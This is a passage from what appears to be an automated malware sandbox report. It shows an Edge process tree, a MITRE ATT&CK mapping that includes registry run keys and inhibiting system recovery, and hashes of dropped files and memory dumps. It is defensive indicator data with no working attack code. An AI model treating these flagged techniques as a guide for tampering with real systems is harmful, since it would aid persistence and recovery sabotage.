        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:1708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
        5⤵
        
        PID:3472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
        5⤵
        
        PID:4516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
        5⤵
        
        PID:4252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5160 /prefetch:8
        5⤵
        
        PID:5020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
        5⤵
        
        PID:4120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
        5⤵
        
        PID:3916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5780 /prefetch:8
        5⤵
        
        PID:268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
        5⤵
        
        PID:4448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
        5⤵
        
        PID:3548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 /prefetch:8
        5⤵
        
        PID:5044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:3668
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7fcb95460,0x7ff7fcb95470,0x7ff7fcb95480
        6⤵
        
        PID:2700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=188 /prefetch:1
        5⤵
        
        PID:5680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
        5⤵
        
        PID:5844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6072 /prefetch:8
        5⤵
        
        PID:5964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:8
        5⤵
        
        PID:6024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3296 /prefetch:8
        5⤵
        
        PID:6120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,10420119891609861175,5414469115082632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:8
        5⤵
        
        PID:4252

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2424

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Windows\Installer\MSI202A.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
C:\Windows\Installer\MSI202A.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
11.8MB

MD5
6c5607b3a429e520ca016b656634c3f9

SHA1
147fde499f4aa074249c793a8f515c3839b3e91e

SHA256
9b2ab8f422f8b7c4c66cd9eb2abf4b012141149796878ca7aba6b1ab24b21a97

SHA512
2c12c39148cd1f78316fdba413f171716377dad9e8912bfb3727e00449e78104fbc8221ba36ba29bcd124ff4150c3d015f64d93d92e0223c5bf80b177961ecf7

Download Submit
\??\Volume{2339e045-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{bda9e2c5-672f-4519-97e6-d55b59e3fc24}_OnDiskSnapshotProp

Filesize
5KB

MD5
cccae511b4a2185498c84f865a8730ff

SHA1
15940de2e0e39f1140227839af553e44fc77800c

SHA256
476f4b6dacdfd303b2dfbf12eeb37d11c489074e03fbed4c833574e6395c0008

SHA512
7db2edd3a4159e184e62279f7d95ed4cfe9e4c9af8c807e124438f936ad72dff4dcfe3707c759161bf5f84808a208b5c44af6e05ba67357ff5f69fa56379aae7

Download Submit
\??\pipe\LOCAL\crashpad_3648_XHFWAGGSKUWVFAXK

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/268-188-0x0000000000000000-mapping.dmp

Download
memory/268-181-0x0000000000000000-mapping.dmp

Download
memory/404-190-0x0000000000000000-mapping.dmp

Download
memory/444-161-0x0000000000000000-mapping.dmp

Download
memory/1084-170-0x0000000000000000-mapping.dmp

Download
memory/1116-144-0x000001E5EAA90000-0x000001E5EAB9F000-memory.dmp

Filesize
1.1MB

Download
memory/1116-133-0x0000000000000000-mapping.dmp

Download
memory/1708-150-0x0000000000000000-mapping.dmp

Download
memory/1832-148-0x0000000000000000-mapping.dmp

Download
memory/2388-174-0x0000000000000000-mapping.dmp

Download
memory/2396-169-0x0000000000000000-mapping.dmp

Download
memory/2428-145-0x000001E8B66D0000-0x000001E8B66D3000-memory.dmp

Filesize
12KB

Download
memory/2628-162-0x0000000000000000-mapping.dmp

Download
memory/2628-175-0x0000000000000000-mapping.dmp

Download
memory/2700-187-0x0000000000000000-mapping.dmp

Download
memory/2808-166-0x0000000000000000-mapping.dmp

Download
memory/3420-191-0x0000000000000000-mapping.dmp

Download
memory/3428-140-0x0000000000000000-mapping.dmp

Download
memory/3472-154-0x0000000000000000-mapping.dmp

Download
memory/3512-171-0x0000000000000000-mapping.dmp

Download
memory/3548-185-0x0000000000000000-mapping.dmp

Download
memory/3564-160-0x0000000000000000-mapping.dmp

Download
memory/3580-141-0x0000000000000000-mapping.dmp

Download
memory/3636-151-0x0000000000000000-mapping.dmp

Download
memory/3648-147-0x0000000000000000-mapping.dmp

Download
memory/3668-186-0x0000000000000000-mapping.dmp

Download
memory/3916-179-0x0000000000000000-mapping.dmp

Download
memory/4120-177-0x0000000000000000-mapping.dmp

Download
memory/4120-165-0x0000000000000000-mapping.dmp

Download
memory/4252-212-0x0000000000000000-mapping.dmp

Download
memory/4252-159-0x0000000000000000-mapping.dmp

Download
memory/4408-146-0x0000000000000000-mapping.dmp

Download
memory/4408-164-0x0000000000000000-mapping.dmp

Download
memory/4448-183-0x0000000000000000-mapping.dmp

Download
memory/4456-132-0x0000000000000000-mapping.dmp

Download
memory/4516-157-0x0000000000000000-mapping.dmp

Download
memory/4568-173-0x0000000000000000-mapping.dmp

Download
memory/4672-142-0x0000000000000000-mapping.dmp

Download
memory/5016-189-0x0000000000000000-mapping.dmp

Download
memory/5020-168-0x0000000000000000-mapping.dmp

Download
memory/5132-192-0x0000000000000000-mapping.dmp

Download
memory/5140-193-0x0000000000000000-mapping.dmp

Download
memory/5160-194-0x0000000000000000-mapping.dmp

Download
memory/5344-195-0x0000000000000000-mapping.dmp

Download
memory/5356-196-0x0000000000000000-mapping.dmp

Download
memory/5368-197-0x0000000000000000-mapping.dmp

Download
memory/5488-198-0x0000000000000000-mapping.dmp

Download
memory/5516-199-0x0000000000000000-mapping.dmp

Download
memory/5524-200-0x0000000000000000-mapping.dmp

Download
memory/5680-202-0x0000000000000000-mapping.dmp

Download
memory/5844-204-0x0000000000000000-mapping.dmp

Download
memory/5964-206-0x0000000000000000-mapping.dmp

Download
memory/6024-208-0x0000000000000000-mapping.dmp

Download
memory/6120-210-0x0000000000000000-mapping.dmp

Download